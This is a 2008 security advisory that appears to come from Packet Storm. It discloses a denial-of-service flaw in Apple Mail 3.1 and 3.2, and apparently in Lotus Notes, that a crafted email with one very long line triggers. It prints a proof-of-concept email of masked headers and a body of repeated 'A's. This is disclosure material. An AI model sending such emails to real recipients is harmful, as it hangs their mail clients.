applemail-dos.txt

2008-05-30T00:00:00
ID PACKETSTORM:66831
Type packetstorm
Reporter David Wharton
Modified 2008-05-30T00:00:00

Description

                                        
                                            `  
***Summary***  
  
A maliciously crafted e-mail message can cause a denial of service in   
multiple versions of the Apple Mail email client.  
  
***Scope***  
  
Apple Mail version 3.1 (914/915)  
Apple Mail version 3.2 (919/919.2)  
  
Note: other versions of this product may be vulnerable as well; I have   
not tested them. The vendor has been made aware of this issue and has   
chosen not to treat it as a security issue.  
  
Interestingly enough, a similar issue seems to be present in multiple   
versions of IBM Lotus Notes (see SPR# EHET5X6Q5Z -- http://www-1.ibm.com/support/docview.wss?rs=463&uid=swg21175611)   
. The exploit provided in this advisory will also cause a denial of   
service condition on multiple versions of IBM Lotus Notes. IBM has   
been kind enough to create SPR# PRAD7DPKLW to address the issue the   
exploit targets.  
  
***Description***  
  
An email message with a maliciously crafted body (in my tests I used a   
long line) can cause the e-mail client to hang, resulting in a denial   
of service condition. Testing with emails that do not have any   
newline characters (0x0A, 0x0D) or spaces (0x20) shows that a line   
consisting of 1.5 MB can cause the email clients to hang for over half   
an hour.  
  
Initial testing reveals the following:  
  
In Apple Mail, the e-mail is rendered correctly in the preview pane   
but a subsequent click on a different e-mail causes the application to   
hang.  
  
***Credits***  
  
David Wharton  
  
***References***  
  
Apple Mail  
http://www.apple.com/macosx/features/mail.html  
  
***PoC Exploit***  
  
Below is a sample e-mail with headers (some headers removed or   
modified) that causes the e-mail clients to hang as discussed. Note   
that the body is one long line and the "=" character is not part of;   
it is there for formatting but in reality most of the body is one long   
contiguous string of A's.  
  
Subject: dos test  
MIME-Version: 1.0  
From: xxxxx@xxxxx.com  
To: xxxxx@xxxxx.com  
Date: xxxxx  
Message-ID: <xxxxx.xxxxx-xxxxx.xxxxx-xxxxx.xxxxx@xxxxx.com>  
X-Mailer: xxxxx  
MIME-Version: 1.0  
Content-Type: text/html;  
charset=ISO-8859-1  
Content-Transfer-Encoding: quoted-printable  
X-CTASD-RefID: str=xxxxx.xxxxx.xxxxx.xxxxx:xxxxx,ss=1,fgs=0  
X-CTASD-IP: xxx.xxx.xxx.xxx  
X-CTASD-Sender: xxxxx@xxxxx.com  
x-ctasd: uncategorized  
x-ctasd-vod: uncategorized  
x-ctasd-station:  
X-OriginalArrivalTime: xxxxx@  
  
  
<font   
size=3D"2">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA   
=  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA   
=  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA   
=  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA   
=  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA   
=  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA   
=  
<snip> (removed a few thousand 'A's)  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA   
=  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA   
=  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA   
=  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA   
=  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA   
=  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</   
font>N=  
OTICE: This e-mail message and all attachments transmitted with it   
may con=  
tain confidential information intended solely for the use of the   
addressee.=  
<br />=  
  
`